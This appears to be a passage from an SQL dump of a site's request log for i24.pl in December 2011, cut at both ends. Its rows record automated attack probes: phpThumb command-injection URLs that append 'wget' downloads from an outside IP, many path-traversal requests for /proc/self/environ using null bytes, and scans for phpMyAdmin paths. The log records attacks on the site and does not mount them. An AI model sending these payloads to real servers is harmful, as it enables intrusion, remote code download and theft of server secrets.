/tmp;wget -','','','',0,'2011-12-22 16:51:14','0000-00-00 00:00:00'),(529,'http://www.i24.pl/content/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /t','','','',0,'2011-12-22 16:51:14','0000-00-00 00:00:00'),(530,'http://www.i24.pl/class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp','','','',0,'2011-12-22 16:51:15','0000-00-00 00:00:00'),(531,'http://www.i24.pl/admin/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp','','','',0,'2011-12-22 16:51:18','0000-00-00 00:00:00'),(532,'http://www.i24.pl/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203','','','',0,'2011-12-22 16:51:19','0000-00-00 00:00:00'),(533,'http://www.i24.pl/admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f','','','',0,'2011-12-22 16:51:19','0000-00-00 00:00:00'),(534,'http://www.i24.pl/assets/components/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;','','','',0,'2011-12-22 16:51:20','0000-00-00 00:00:00'),(535,'http://www.i24.pl/components/com_alphacontent/assets/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.','','','',0,'2011-12-22 16:51:20','0000-00-00 00:00:00'),(536,'http://www.i24.pl/components/com_alphauserpoints/assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fa','','','',0,'2011-12-22 16:51:28','0000-00-00 00:00:00'),(537,'http://www.i24.pl/admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:','','','',0,'2011-12-22 16:51:29','0000-00-00 00:00:00'),(538,'http://www.i24.pl/zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg','','','',0,'2011-12-22 16:51:29','0000-00-00 00:00:00'),(539,'http://www.i24.pl/wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ;','','','',0,'2011-12-22 16:51:30','0000-00-00 00:00:00'),(540,'http://www.i24.pl/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:f','','','',0,'2011-12-22 16:51:30','0000-00-00 00:00:00'),(541,'http://www.i24.pl/admin/categories.php/login.php?cPath=&action=new_product_preview','','','',0,'2011-12-23 10:28:42','0000-00-00 00:00:00'),(542,'http://www.i24.pl/sitecore/login','','','',0,'2011-12-23 19:33:42','0000-00-00 00:00:00'),(543,'http://www.i24.pl/muieblackcat','','','',0,'2011-12-24 18:30:14','0000-00-00 00:00:00'),(544,'http://www.i24.pl//index.php','','','',0,'2011-12-24 18:30:15','0000-00-00 00:00:00'),(545,'http://www.i24.pl//admin/index.php','','','',0,'2011-12-24 18:30:16','0000-00-00 00:00:00'),(546,'http://www.i24.pl//admin/pma/index.php','','','',0,'2011-12-24 18:30:17','0000-00-00 00:00:00'),(547,'http://www.i24.pl//admin/phpmyadmin/index.php','','','',0,'2011-12-24 18:30:18','0000-00-00 00:00:00'),(548,'http://www.i24.pl//db/index.php','','','',0,'2011-12-24 18:30:19','0000-00-00 00:00:00'),(549,'http://www.i24.pl//dbadmin/index.php','','','',0,'2011-12-24 18:30:20','0000-00-00 00:00:00'),(550,'http://www.i24.pl//myadmin/index.php','','','',0,'2011-12-24 18:30:21','0000-00-00 00:00:00'),(551,'http://www.i24.pl//mysql/index.php','','','',0,'2011-12-24 18:30:22','0000-00-00 00:00:00'),(552,'http://www.i24.pl//mysqladmin/index.php','','','',0,'2011-12-24 18:30:23','0000-00-00 00:00:00'),(553,'http://www.i24.pl//typo3/phpmyadmin/index.php','','','',0,'2011-12-24 18:30:23','0000-00-00 00:00:00'),(554,'http://www.i24.pl//phpadmin/index.php','','','',0,'2011-12-24 18:30:24','0000-00-00 00:00:00'),(555,'http://www.i24.pl//phpMyAdmin/index.php','','','',0,'2011-12-24 18:30:25','0000-00-00 00:00:00'),(556,'http://www.i24.pl//phpmyadmin1/index.php','','','',0,'2011-12-24 18:30:27','0000-00-00 00:00:00'),(557,'http://www.i24.pl//phpmyadmin2/index.php','','','',0,'2011-12-24 18:30:28','0000-00-00 00:00:00'),(558,'http://www.i24.pl//pma/index.php','','','',0,'2011-12-24 18:30:29','0000-00-00 00:00:00'),(559,'http://www.i24.pl//web/phpMyAdmin/index.php','','','',0,'2011-12-24 18:30:29','0000-00-00 00:00:00'),(560,'http://www.i24.pl//xampp/phpmyadmin/index.php','','','',0,'2011-12-24 18:30:30','0000-00-00 00:00:00'),(561,'http://www.i24.pl//web/index.php','','','',0,'2011-12-24 18:30:31','0000-00-00 00:00:00'),(562,'http://www.i24.pl//php-my-admin/index.php','','','',0,'2011-12-24 18:30:32','0000-00-00 00:00:00'),(563,'http://www.i24.pl//websql/index.php','','','',0,'2011-12-24 18:30:33','0000-00-00 00:00:00'),(564,'http://www.i24.pl//phpMyAdmin-2/index.php','','','',0,'2011-12-24 18:30:35','0000-00-00 00:00:00'),(565,'http://www.i24.pl//phpMyAdmin-2.2.3/index.php','','','',0,'2011-12-24 18:30:37','0000-00-00 00:00:00'),(566,'http://www.i24.pl//phpMyAdmin-2.2.6/index.php','','','',0,'2011-12-24 18:30:38','0000-00-00 00:00:00'),(567,'http://www.i24.pl//phpMyAdmin-2.5.1/index.php','','','',0,'2011-12-24 18:30:39','0000-00-00 00:00:00'),(568,'http://www.i24.pl//phpMyAdmin-2.5.4/index.php','','','',0,'2011-12-24 18:30:39','0000-00-00 00:00:00'),(569,'http://www.i24.pl//phpMyAdmin-2.5.5-rc1/index.php','','','',0,'2011-12-24 18:30:40','0000-00-00 00:00:00'),(570,'http://www.i24.pl//phpMyAdmin-2.5.5-rc2/index.php','','','',0,'2011-12-24 18:30:41','0000-00-00 00:00:00'),(571,'http://www.i24.pl//phpMyAdmin-2.5.5/index.php','','','',0,'2011-12-24 18:30:42','0000-00-00 00:00:00'),(572,'http://www.i24.pl//phpMyAdmin-2.5.5-pl1/index.php','','','',0,'2011-12-24 18:30:43','0000-00-00 00:00:00'),(573,'http://www.i24.pl//phpMyAdmin-2.5.6-rc1/index.php','','','',0,'2011-12-24 18:30:43','0000-00-00 00:00:00'),(574,'http://www.i24.pl//phpMyAdmin-2.5.6-rc2/index.php','','','',0,'2011-12-24 18:30:45','0000-00-00 00:00:00'),(575,'http://www.i24.pl//phpMyAdmin-2.5.6/index.php','','','',0,'2011-12-24 18:30:45','0000-00-00 00:00:00'),(576,'http://www.i24.pl//phpMyAdmin-2.5.7/index.php','','','',0,'2011-12-24 18:30:46','0000-00-00 00:00:00'),(577,'http://www.i24.pl//phpMyAdmin-2.5.7-pl1/index.php','','','',0,'2011-12-24 18:30:47','0000-00-00 00:00:00'),(578,'http://www.i24.pl/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbu','','','',0,'2011-12-27 17:14:11','0000-00-00 00:00:00'),(579,'http://www.i24.pl/lib/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/b','','','',0,'2011-12-27 17:14:14','0000-00-00 00:00:00'),(580,'http://www.i24.pl/thumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 ','','','',0,'2011-12-27 17:14:14','0000-00-00 00:00:00'),(581,'http://www.i24.pl/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoo','','','',0,'2011-12-27 17:14:16','0000-00-00 00:00:00'),(582,'http://www.i24.pl/admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/b','','','',0,'2011-12-27 17:14:16','0000-00-00 00:00:00'),(583,'http://www.i24.pl/yappa-ng/src/index_overview.inc.php?co','','','',0,'2011-12-29 03:02:43','0000-00-00 00:00:00'),(584,'http://www.i24.pl/src/image.class.php?config[image_module]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:02:50','0000-00-00 00:00:00'),(585,'http://www.i24.pl/includes/db_adodb.php?baseDir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:02:53','0000-00-00 00:00:00'),(586,'http://www.i24.pl/includes/db_connect.php?baseDir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:02:54','0000-00-00 00:00:00'),(587,'http://www.i24.pl/includes/session.php?baseDir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:02:54','0000-00-00 00:00:00'),(588,'http://www.i24.pl/modules/projects/gantt.php?dPconfig[root_dir]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:02:55','0000-00-00 00:00:00'),(589,'http://www.i24.pl/modules/projects/gantt2.php?dPconfig[root_dir]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:02:56','0000-00-00 00:00:00'),(590,'http://www.i24.pl/modules/projects/vw_files.php?dPconfig[root_dir]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:02:57','0000-00-00 00:00:00'),(591,'http://www.i24.pl/modules/admin/vw_usr_roles.php?baseDir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:02:58','0000-00-00 00:00:00'),(592,'http://www.i24.pl/modules/public/calendar.php?baseDir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:02:58','0000-00-00 00:00:00'),(593,'http://www.i24.pl/modules/public/date_format.php?baseDir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:02:59','0000-00-00 00:00:00'),(594,'http://www.i24.pl/modules/tasks/gantt.php?baseDir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:00','0000-00-00 00:00:00'),(595,'http://www.i24.pl/mantis/login_page.php?g_meta_inc','','','',0,'2011-12-29 03:03:01','0000-00-00 00:00:00'),(596,'http://www.i24.pl/phpgedview/help_text_vars.php?PGV_BA','','','',0,'2011-12-29 03:03:02','0000-00-00 00:00:00'),(597,'http://www.i24.pl/nukebrowser.php?filnavn=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:04','0000-00-00 00:00:00'),(598,'http://www.i24.pl/bug_sponsorship_list_view','','','',0,'2011-12-29 03:03:05','0000-00-00 00:00:00'),(599,'http://www.i24.pl/modules/coppermine/themes/maze/theme.php?THEME_DIR=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:06','0000-00-00 00:00:00'),(600,'http://www.i24.pl/includes/calendar.php?phpc_root_pa','','','',0,'2011-12-29 03:03:08','0000-00-00 00:00:00'),(601,'http://www.i24.pl/phpBB/admin/admin_styles.php?mode=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:10','0000-00-00 00:00:00'),(602,'http://www.i24.pl/aMember/plugins/db/mysql/mysql.inc.php?config=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:11','0000-00-00 00:00:00'),(603,'http://www.i24.pl/admin/lang.php?CMS_ADMIN_PAGE=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:11','0000-00-00 00:00:00'),(604,'http://www.i24.pl/modules/My_eGallery/index.php?basepath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:25','0000-00-00 00:00:00'),(605,'http://www.i24.pl/journal.php?m=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:27','0000-00-00 00:00:00'),(606,'http://www.i24.pl/links.php?c=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:29','0000-00-00 00:00:00'),(607,'http://www.i24.pl/forums.php?m=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:30','0000-00-00 00:00:00'),(608,'http://www.i24.pl/list.php?c=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:31','0000-00-00 00:00:00'),(609,'http://www.i24.pl/user.php?xoops_redirect=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:31','0000-00-00 00:00:00'),(610,'http://www.i24.pl/r.php?url=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:33','0000-00-00 00:00:00'),(611,'http://www.i24.pl/CubeCart/includes/orderSuccess.inc.php?&glo','','','',0,'2011-12-29 03:03:34','0000-00-00 00:00:00'),(612,'http://www.i24.pl/inc/formmail.inc.php?script_r','','','',0,'2011-12-29 03:03:35','0000-00-00 00:00:00'),(613,'http://www.i24.pl/include/init.inc.php?G_PATH=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:36','0000-00-00 00:00:00'),(614,'http://www.i24.pl/backend/addons/links/index.php?PATH=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:36','0000-00-00 00:00:00'),(615,'http://www.i24.pl/modules/newbb_plus/class/class.forumposts.php?bbPa','','','',0,'2011-12-29 03:03:37','0000-00-00 00:00:00'),(616,'http://www.i24.pl/mail_autocheck.php?pm_pat','','','',0,'2011-12-29 03:03:40','0000-00-00 00:00:00'),(617,'http://www.i24.pl/path_of_cpcommerce/_functions.php?prefix=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:03:45','0000-00-00 00:00:00'),(618,'http://www.i24.pl/community/modules/agendax/addevent.inc.php?agendax_','','','',0,'2011-12-29 03:03:45','0000-00-00 00:00:00'),(619,'http://www.i24.pl/includes/include_onde.php?include_','','','',0,'2011-12-29 03:03:57','0000-00-00 00:00:00'),(620,'http://www.i24.pl/print.php?val1=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:01','0000-00-00 00:00:00'),(621,'http://www.i24.pl/cmd.php?function=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:02','0000-00-00 00:00:00'),(622,'http://www.i24.pl/iframe.php?file=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:02','0000-00-00 00:00:00'),(623,'http://www.i24.pl/os/pointer.php?url=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:03','0000-00-00 00:00:00'),(624,'http://www.i24.pl/p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:04','0000-00-00 00:00:00'),(625,'http://www.i24.pl/phpGedView/individual.php?PGV_BASE_D','','','',0,'2011-12-29 03:04:06','0000-00-00 00:00:00'),(626,'http://www.i24.pl/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:08','0000-00-00 00:00:00'),(627,'http://www.i24.pl/Sources/Packages.php?sourcedir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:09','0000-00-00 00:00:00'),(628,'http://www.i24.pl/modules/PNphpBB2/includes/functions_admin.php?phpbb','','','',0,'2011-12-29 03:04:11','0000-00-00 00:00:00'),(629,'http://www.i24.pl/gallery/captionator.php?GALLERY_B','','','',0,'2011-12-29 03:04:13','0000-00-00 00:00:00'),(630,'http://www.i24.pl/Blog/BlogModel.php?path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:14','0000-00-00 00:00:00'),(631,'http://www.i24.pl/expanded.php?conf=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:16','0000-00-00 00:00:00'),(632,'http://www.i24.pl/displayCategory.php?basep','','','',0,'2011-12-29 03:04:18','0000-00-00 00:00:00'),(633,'http://www.i24.pl/phpBB2/admin/admin_cash.php?phpbb_root','','','',0,'2011-12-29 03:04:19','0000-00-00 00:00:00'),(634,'http://www.i24.pl/modules/foro/includes/functions_admin.php?phpbb','','','',0,'2011-12-29 03:04:19','0000-00-00 00:00:00'),(635,'http://www.i24.pl/modules/Forums/admin/admin_forums.php?phpEx=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:20','0000-00-00 00:00:00'),(636,'http://www.i24.pl/modules/Forums/admin/admin_disallow.php?phpEx=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:21','0000-00-00 00:00:00'),(637,'http://www.i24.pl/modules/Forums/admin/admin_smilies.php?phpEx=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:22','0000-00-00 00:00:00'),(638,'http://www.i24.pl/modules/Forums/admin/admin_board.php?phpEx=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:22','0000-00-00 00:00:00'),(639,'http://www.i24.pl/modules/Forums/admin/admin_users.php?phpEx=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:23','0000-00-00 00:00:00'),(640,'http://www.i24.pl/modules/Forums/admin/admin_mass_email.php?phpE','','','',0,'2011-12-29 03:04:24','0000-00-00 00:00:00'),(641,'http://www.i24.pl/modules/Forums/admin/admin_forum_prune.php?php','','','',0,'2011-12-29 03:04:25','0000-00-00 00:00:00'),(642,'http://www.i24.pl/modules/Forums/admin/admin_styles.php?phpbb_ro','','','',0,'2011-12-29 03:04:25','0000-00-00 00:00:00'),(643,'http://www.i24.pl/webcalendar/tools/send_reminders.php?includ','','','',0,'2011-12-29 03:04:28','0000-00-00 00:00:00'),(644,'http://www.i24.pl/cmd/product_info.php/products_id/1622/shop_content.php?coID=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:29','0000-00-00 00:00:00'),(645,'http://www.i24.pl/addevent.inc.php?agendax_','','','',0,'2011-12-29 03:04:30','0000-00-00 00:00:00'),(646,'http://www.i24.pl/step_one.php?server_inc=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:31','0000-00-00 00:00:00'),(647,'http://www.i24.pl/upgrade_album.php?GALLERY','','','',0,'2011-12-29 03:04:31','0000-00-00 00:00:00'),(648,'http://www.i24.pl/search.php?cutepath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:32','0000-00-00 00:00:00'),(649,'http://www.i24.pl/modules.php?name=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:33','0000-00-00 00:00:00'),(650,'http://www.i24.pl/wagora/extras//quicklist.php?site=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:34','0000-00-00 00:00:00'),(651,'http://www.i24.pl/vCard/admin/define.inc.php?match=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:34','0000-00-00 00:00:00'),(652,'http://www.i24.pl/forum/ubbthreads.php?Cat=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:35','0000-00-00 00:00:00'),(653,'http://www.i24.pl/admin/includes/classes/spaw/spaw_control.class.php?sp','','','',0,'2011-12-29 03:04:36','0000-00-00 00:00:00'),(654,'http://www.i24.pl/secure.php?cfgProgDir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:37','0000-00-00 00:00:00'),(655,'http://www.i24.pl/modules/My_eGallery/public//inc/?HCL_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:38','0000-00-00 00:00:00'),(656,'http://www.i24.pl/modules/My_eGallery/public/imagen.php?basepath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:38','0000-00-00 00:00:00'),(657,'http://www.i24.pl/adlayer.php?layerstyle=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:39','0000-00-00 00:00:00'),(658,'http://www.i24.pl/Forums/bb_smilies.php?name=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:40','0000-00-00 00:00:00'),(659,'http://www.i24.pl/modules/Forums/bb_smilies.php?name=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:41','0000-00-00 00:00:00'),(660,'http://www.i24.pl/gadgets/Blog/BlogModel.php?path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:41','0000-00-00 00:00:00'),(661,'http://www.i24.pl/learnlinc/clmcpreload.php?CLPATH=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:42','0000-00-00 00:00:00'),(662,'http://www.i24.pl/modernbill/samples/news.php?DIR=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:43','0000-00-00 00:00:00'),(663,'http://www.i24.pl/religions/faq.php?page=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:44','0000-00-00 00:00:00'),(664,'http://www.i24.pl/forum/viewtopic.php?t=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:45','0000-00-00 00:00:00'),(665,'http://www.i24.pl/announcements.php?include','','','',0,'2011-12-29 03:04:46','0000-00-00 00:00:00'),(666,'http://www.i24.pl/phpatm/index.php?include_locatio','','','',0,'2011-12-29 03:04:47','0000-00-00 00:00:00'),(667,'http://www.i24.pl/shannen/index.php?x=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:48','0000-00-00 00:00:00'),(668,'http://www.i24.pl/family/phpgedview/index.php?PGV_BASE_DIRECT','','','',0,'2011-12-29 03:04:49','0000-00-00 00:00:00'),(669,'http://www.i24.pl/main.php?left=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:50','0000-00-00 00:00:00'),(670,'http://www.i24.pl/forum/misc.php?action=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:51','0000-00-00 00:00:00'),(671,'http://www.i24.pl/nucleus/libs/globalfunctions.php?DIR_L','','','',0,'2011-12-29 03:04:51','0000-00-00 00:00:00'),(672,'http://www.i24.pl/show_archives.php?cutepat','','','',0,'2011-12-29 03:04:52','0000-00-00 00:00:00'),(673,'http://www.i24.pl/magicforum/misc.php?action=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:54','0000-00-00 00:00:00'),(674,'http://www.i24.pl/forum/admin/actions/del.php?include_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:54','0000-00-00 00:00:00'),(675,'http://www.i24.pl/local/investing_industrialeasta','','','',0,'2011-12-29 03:04:56','0000-00-00 00:00:00'),(676,'http://www.i24.pl/modules/coppermine/themes/default/theme.php?THEME_DIR../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:57','0000-00-00 00:00:00'),(677,'http://www.i24.pl/Popper/index.php?childwindow.inc','','','',0,'2011-12-29 03:04:58','0000-00-00 00:00:00'),(678,'http://www.i24.pl/class.mysql.php?path_to_b','','','',0,'2011-12-29 03:04:58','0000-00-00 00:00:00'),(679,'http://www.i24.pl/include/footer.inc.php?_AMLconfig[cfg_serverpath]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:04:59','0000-00-00 00:00:00'),(680,'http://www.i24.pl/eyeos/desktop.php?baccio=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:00','0000-00-00 00:00:00'),(681,'http://www.i24.pl/modules/module_db.php?pivot_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:04','0000-00-00 00:00:00'),(682,'http://www.i24.pl/catalog/includes/include_once.php?include_','','','',0,'2011-12-29 03:05:05','0000-00-00 00:00:00'),(683,'http://www.i24.pl/live/inc/pipe.php?HCL_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:06','0000-00-00 00:00:00'),(684,'http://www.i24.pl/zb41/include/write.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:07','0000-00-00 00:00:00'),(685,'http://www.i24.pl/inc/step_one_tables.php?serve','','','',0,'2011-12-29 03:05:09','0000-00-00 00:00:00'),(686,'http://www.i24.pl/phpprojekt/lib/authform.inc.php?path_pre','','','',0,'2011-12-29 03:05:11','0000-00-00 00:00:00'),(687,'http://www.i24.pl/captionator.php?GALLERY_B','','','',0,'2011-12-29 03:05:11','0000-00-00 00:00:00'),(688,'http://www.i24.pl/_head.php?_zb_path=.examp','','','',0,'2011-12-29 03:05:12','0000-00-00 00:00:00'),(689,'http://www.i24.pl/include/msql.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:15','0000-00-00 00:00:00'),(690,'http://www.i24.pl/include/mssql7.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:16','0000-00-00 00:00:00'),(691,'http://www.i24.pl/include/mysql.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:16','0000-00-00 00:00:00'),(692,'http://www.i24.pl/include/oci8.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:17','0000-00-00 00:00:00'),(693,'http://www.i24.pl/include/postgres.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:18','0000-00-00 00:00:00'),(694,'http://www.i24.pl/include/postgres65.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:18','0000-00-00 00:00:00'),(695,'http://www.i24.pl/install.php?phpbb_root_di','','','',0,'2011-12-29 03:05:19','0000-00-00 00:00:00'),(696,'http://www.i24.pl/page.php?template=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:21','0000-00-00 00:00:00'),(697,'http://www.i24.pl/phorum/admin/actions/del.php?include_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:21','0000-00-00 00:00:00'),(698,'http://www.i24.pl/pollensondage.inc.php?app','','','',0,'2011-12-29 03:05:22','0000-00-00 00:00:00'),(699,'http://www.i24.pl/user/agora_user.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:23','0000-00-00 00:00:00'),(700,'http://www.i24.pl/user/ldap_example.php?inc_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:24','0000-00-00 00:00:00'),(701,'http://www.i24.pl/userlist.php?ME=.example.','','','',0,'2011-12-29 03:05:24','0000-00-00 00:00:00'),(702,'http://www.i24.pl/includes/include_once.php?include_','','','',0,'2011-12-29 03:05:29','0000-00-00 00:00:00'),(703,'http://www.i24.pl/modules.php?name=jokeid=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:29','0000-00-00 00:00:00'),(704,'http://www.i24.pl/phpgwapi/setup/tables_update.inc.php?app','','','',0,'2011-12-29 03:05:37','0000-00-00 00:00:00'),(705,'http://www.i24.pl/inc/authform.inc.php?path_pre','','','',0,'2011-12-29 03:05:39','0000-00-00 00:00:00'),(706,'http://www.i24.pl/include/authform.inc.php?path_pre','','','',0,'2011-12-29 03:05:40','0000-00-00 00:00:00'),(707,'http://www.i24.pl/web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:41','0000-00-00 00:00:00'),(708,'http://www.i24.pl/web_statistics//tools/send_reminders.php?includ','','','',0,'2011-12-29 03:05:41','0000-00-00 00:00:00'),(709,'http://www.i24.pl/web_statistics//include/write.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:42','0000-00-00 00:00:00'),(710,'http://www.i24.pl/web_statistics//modules/My_eGallery/public/displayCategory.php?basep','','','',0,'2011-12-29 03:05:43','0000-00-00 00:00:00'),(711,'http://www.i24.pl/web_statistics//calendar/tools/send_reminders.php?includ','','','',0,'2011-12-29 03:05:44','0000-00-00 00:00:00'),(712,'http://www.i24.pl/web_statistics//skin/zero_vote/error.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:44','0000-00-00 00:00:00'),(713,'http://www.i24.pl/web_statistics//coppercop/theme.php?THEME_DIR=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:05:45','0000-00-00 00:00:00'),(714,'http://www.i24.pl/include/livre_include.php?chem_ab','','','',0,'2011-12-29 03:05:54','0000-00-00 00:00:00'),(715,'http://www.i24.pl/phpopenchat/contrib/yabbse/poc.php?sourcedir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:06','0000-00-00 00:00:00'),(716,'http://www.i24.pl/calendar/calendar.php?serverPath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:07','0000-00-00 00:00:00'),(717,'http://www.i24.pl/calendar/functions/popup.php?serverPath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:07','0000-00-00 00:00:00'),(718,'http://www.i24.pl/calendar/setup/setupSQL.php?serverPath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:10','0000-00-00 00:00:00'),(719,'http://www.i24.pl/install/index.php?G_PATH=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:11','0000-00-00 00:00:00'),(720,'http://www.i24.pl/contacts.php?cal_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:21','0000-00-00 00:00:00'),(721,'http://www.i24.pl/stats/modules/My_eGallery/index.php?basepath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:26','0000-00-00 